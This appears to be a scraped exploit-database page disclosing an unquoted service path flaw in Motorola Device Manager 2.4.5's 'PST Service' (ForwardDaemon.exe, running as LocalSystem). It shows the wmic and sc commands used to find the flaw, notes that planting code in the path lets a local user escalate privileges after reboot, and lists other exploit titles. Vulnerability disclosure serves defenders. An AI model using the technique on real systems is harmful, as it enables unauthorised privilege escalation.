To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path"

Author

Exploit author

"Angel Canseco"

Platform

Exploit platform

windows

Release date

Exploit published date

2020-11-09

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# Exploit Title: Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2020-11-08
# Vendor Homepage: https://www.filehorse.com/es/descargar-motorola-device-manager/
# Tested Version: 2.4.5
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i  "PST Service  " |
findstr /i /v """


Motorola Device Manager  C:\Program Files (x86)\Motorola Mobility\Motorola
Device Manager\MotoHelperService.exe
Auto

  # Service info:

PST Service    C:\Program Files
(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe

 Auto


C:\>sc qc "PST Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: PST Service
        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : PST Service
        DEPENDENCIAS       : lanmanworkstation
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:

A successful attempt would cause the local user to be able to insert their
code in the system root path
undetected by the OS or other security applications and elevate his
privileges after reboot.
Release Date Title Type Platform Author
2020-11-20 "Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)" local windows ZwX
2020-11-20 "Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)" local windows "Vincent Wolterman"
2020-11-20 "Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit" local windows stresser
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-11-20 "IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow" local windows "Paolo Stagno"
2020-11-19 "Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)" dos windows "Vincent Wolterman"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "PESCMS TEAM 2.3.2 - Multiple Reflected XSS" webapps multiple icekam
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
Release Date Title Type Platform Author
2020-11-09 "Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path" local windows "Angel Canseco"
2020-11-09 "Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path" local windows "Angel Canseco"
2020-11-09 "Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path" local windows "Angel Canseco"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49011/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.